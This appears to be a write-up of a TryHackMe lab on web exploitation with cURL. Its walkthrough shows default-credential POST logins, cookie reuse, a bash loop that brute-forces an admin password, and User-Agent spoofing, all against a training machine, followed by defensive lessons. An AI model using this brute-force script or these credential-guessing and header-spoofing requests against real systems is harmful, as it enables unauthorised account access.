Exploitation with cURL - Hoperation Eggsploit
Day 24
The evil Easter bunnies operate a web control panel that holds the wormhole open. Using cURL, identify the endpoints, send the required requests, and shut the wormhole once and for all.
Exploitation with cURL
Overview
Room URL: https://tryhackme.com/room/webhackingusingcurl-aoc2025-w8q1a4s7d0
Difficulty: Easy
Category: Curl
Date Completed: 12/26/2025
Objective
- Understand what HTTP requests and responses are at a high level.
- Use cURL to make basic requests (using GET) and view raw responses in the terminal.
- Send POST requests with cURL to submit data to endpoints.
- Work with cookies and sessions in cURL to maintain login state across requests.
Table of Contents
Introduction
Walk Through
Lessons Learned
Resources
Introduction
This TryHackMe challenge serves as a practical introduction to HTTP request manipulation using cURL, demonstrating how command-line tools can interact with web applications without a browser. The challenge progressively builds skills through five core tasks plus a bonus mission, covering fundamental web exploitation concepts including POST request crafting, session cookie management, credential brute forcing, and User-Agent spoofing. Participants assume the role of a blue team operator tasked with testing various authentication mechanisms and ultimately closing a wormhole by infiltrating an Easter bunny control panel in the bonus mission.
Key Information
cURL Flags:
-X POST: Specify HTTP method-d: Define POST data payload-c: Save received cookies to file-b: Send cookies from file-A: Spoof User-Agent header-s: Silent mode (suppress progress meter)-i: Include HTTP response headers
Walk Through
- Start Target Machine & Connect to VPN
curl http://10.66.181.228/
- Make a POST request to the
/post.phpendpoint with the usernameadminand the passwordadmin. What is the flag you receive?curl -X POST -d "username=admin&password=admin" http://10.66.181.228/post.php
- Make a request to the
/cookie.phpendpoint with the usernameadminand the passwordadminand save the cookie. Reuse that saved cookie at the same endpoint. What is the flag your receive?curl -c cookies.txt -d "username=admin&password=admin" http://10.66.181.228/cookie.phpcurl -b cookies.txt http://10.66.181.228/cookie.php
- After doing the brute force on the
/bruteforce.phpendpoint, what is the password of theadminuser?nano passwords.txtadmin123 password letmein secretpass secretnano loop.shfor pass in $(cat passwords.txt); do echo "Trying password: $pass" response=$(curl -s -X POST -d "username=admin&password=$pass" http://10.66.181.228/bruteforce.php) if echo "$response" | grep -q "Welcome"; then echo "[+] Password found: $pass" break fi donechmod +x loop.sh./loop.sh
- Make a request to the
/agent.phpendpoint with the user-agentTBFC. What is the flag your receive?curl -A "internalcomputer" http://10.66.181.228/ua_check.phpcurl -i http://10.66.181.228/ua_check.phpcurl -i -A "internalcomputer" http://10.66.181.228/ua_check.phpcurl -A "TBFC" http://10.66.181.228/agent.php
Lessons Learned
- Weak Credential Management: Using default credentials (admin/admin) violates the principle of least privilege and secure defaults. Organizations must enforce strong password policies and eliminate default accounts before production deployment.
- Insufficient Rate Limiting: The brute force endpoint lacked attempt throttling or account lockout mechanisms. Implementing exponential backoff, CAPTCHA after N failed attempts, or temporary account locks would significantly impede automated attacks.
- Client-Side Security Controls: Relying on User-Agent validation for access control demonstrates "security through obscurity." Client-controlled headers are trivially spoofed and should never be trusted for authentication or authorization decisions.
- Predictable Session Management: Session tokens that follow predictable patterns or aren't properly validated enable session hijacking. Implementing cryptographically secure random session IDs with proper expiration is essential.